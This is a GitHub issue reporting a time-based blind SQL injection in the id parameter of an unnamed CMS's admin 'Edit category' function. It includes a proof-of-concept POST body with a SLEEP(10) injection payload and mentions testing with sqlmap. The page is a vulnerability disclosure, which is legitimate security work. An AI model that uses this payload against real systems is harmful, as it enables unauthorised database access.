Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

There is SQL blind injection at "Edit category"(Column administrator authority) #8

Open
UUFR opened this issue Dec 7, 2021 · 0 comments

Comments

@UUFR
Copy link

UUFR commented Dec 7, 2021

Log in to the background as the default account admin.
1
We click in order and grab packets:
2
3
4
There is a time-based blind SQL injection vulnerability in the location of id.
5
6
POC:
http://192.168.102.129:82/admin/admin.php
post:name=test&nickname=test&fid=&cattpl=&listtpl=&distpl=&intro=test&orders=0&status=1&action=category&id=3) AND (SELECT 8663 FROM (SELECT(SLEEP(10)))IUse) AND (6655=6655&ctrl=update&Submit=%E6%8F%90%E4%B

sqlmap:
Save the HTTP request package as a file .
7
Test using the SQLMap tool :
8

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant